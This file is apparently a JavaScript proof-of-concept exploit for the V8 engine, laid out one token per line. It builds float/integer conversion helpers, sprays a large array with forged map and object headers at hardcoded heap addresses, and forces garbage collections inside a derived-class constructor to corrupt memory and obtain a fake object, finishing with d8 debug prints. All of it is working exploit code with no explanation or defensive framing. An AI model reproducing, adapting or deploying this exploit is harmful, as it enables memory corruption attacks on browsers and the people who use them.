var
buf =
new
ArrayBuffer(8);
var
dv =
new
DataView(buf);
var
u8 =
new
Uint8Array(buf);
var
u32 =
new
Uint32Array(buf);
var
u64 =
new
BigUint64Array(buf);
var
f32 =
new
Float32Array(buf);
var
f64 =
new
Float64Array(buf);
var
roots =
new
Array(0x30000);
var
index = 0;
function
pair_u32_to_f64(l, h) {
u32[0] = l;
u32[1] = h;
return
f64[0];
}
function
u64_to_f64(val) {
u64[0] = val;
return
f64[0];
}
function
f64_to_u64(val) {
f64[0] = val;
return
u64[0];
}
function
set_u64(val) {
u64[0] = val;
}
function
set_l(l) {
u32[0] = l;
}
function
set_h(h) {
u32[1] = h;
}
function
get_l() {
return
u32[0];
}
function
get_h() {
return
u32[1];
}
function
get_u64() {
return
u64[0];
}
function
get_f64() {
return
f64[0];
}
function
get_fl(val) {
f64[0] = val;
return
u32[0];
}
function
get_fh(val) {
f64[0] = val;
return
u32[1];
}
function
add_ref(obj) {
roots[index++] = obj;
}
var
gc_flag=
false
;
function
major_gc() {
if
(gc_flag) {
new
ArrayBuffer(0x7fe00000);
return
0;
}
return
1;
}
function
minor_gc() {
if
(gc_flag) {
for
(let i = 0; i < 8; i++) {
add_ref(
new
ArrayBuffer(0x200000));
}
add_ref(
new
ArrayBuffer(8));
return
2;
}
return
1;
}
function
hexx(str, val) {
console.log(str+
": 0x"
+val.toString(16));
}
function
sleep(ms) {
return
new
Promise((resolve) => setTimeout(resolve, ms));
}
var
spray_array =
new
Array(0xf700).fill(1.1);
var
element_start_addr = 0x00442139;
var
data_element_start_addr = element_start_addr + 7;
var
map_addr = data_element_start_addr + 0x1000;
var
fake_object_addr = map_addr + 0x1000;
var
element_map_addr = fake_object_addr + 0x200;
spray_array[(map_addr - data_element_start_addr) / 8] = pair_u32_to_f64(data_element_start_addr+0x200+1, 0x32040404);
spray_array[(map_addr - data_element_start_addr) / 8 + 1] = u64_to_f64(0x0a0007ff11000842n);
spray_array[(fake_object_addr - data_element_start_addr) / 8] = pair_u32_to_f64(map_addr+1, 0x6cd);
spray_array[(fake_object_addr - data_element_start_addr) / 8 + 1] = pair_u32_to_f64(3, 0x20);
spray_array[(element_map_addr - data_element_start_addr) / 8 + 0] = u64_to_f64(0x61000000000004c5n);
spray_array[(element_map_addr - data_element_start_addr) / 8 + 1] = u64_to_f64(0x004003ff0c0000b1n);
spray_array[(element_map_addr - data_element_start_addr) / 8 + 2] = u64_to_f64(0x0000007d0000007dn);
spray_array[(element_map_addr - data_element_start_addr) / 8 + 3] = u64_to_f64(0x000006dd00000701n);
spray_array[(element_map_addr - data_element_start_addr) / 8 + 3] = u64_to_f64(0x0000000000000000n);
var
str_addr = element_map_addr + 0x100;
spray_array[(str_addr - data_element_start_addr) / 8 + 0] = u64_to_f64(0xd6d6d7e2000003d5n);
spray_array[(str_addr - data_element_start_addr) / 8 + 1] = u64_to_f64(0x0000007000000001n);
print(
"fake_object_addr:"
, pair_u32_to_f64(fake_object_addr+1, fake_object_addr+1));
hexx(
"fake_object_addr"
, fake_object_addr+1);
hexx(
"element_map_addr"
, element_map_addr+1);
var
header = pair_u32_to_f64(element_map_addr+1, 0x40);
var
X = pair_u32_to_f64(str_addr+1, 1);
var
nnn = pair_u32_to_f64(fake_object_addr+1, fake_object_addr+1);
var
debug =
false
;
var
empty_object = {};
class A {}
class B extends A {
constructor() {
const check =
new
new
.target;
let v = [
empty_object,empty_object,empty_object,empty_object,
empty_object,empty_object,empty_object,empty_object,
];
super
();
let o = [
header, header, header, header,
X,X,X,X,X,X,X,X,
nnn, nnn, nnn, nnn, nnn, nnn, nnn, nnn,
nnn, nnn, nnn, nnn, nnn, nnn, nnn, nnn,
nnn, nnn, nnn, nnn, nnn, nnn, nnn, nnn,
header, header, header, header,
];
this
.o = o;
this
.v = v;
}
[100] = major_gc();
}
for
(let i = 0; i < 200; i++) {
if
(i % 2 == 0) gc_flag =
true
;
major_gc();
gc_flag =
false
;
}
var
w =
null
;
const N = 640;
const M = 644;
const S = 650;
var
block =
null
;
for
(let i = 0; i < S; i++) {
gc_flag =
false
;
if
(i == N || (M < i && i < M+4)) {
gc_flag =
true
;
major_gc();
gc_flag =
false
;
}
if
(i == M+3) {
gc_flag =
true
;
}
let r = Reflect.construct(B, [], A);
if
(i == M+3) w = r;
}
try
{
print(w.v[0]);
}
catch
(m) {
%DebugPrint(w[
'p'
]);
%DebugPrint(w);
}
print(
"END"
);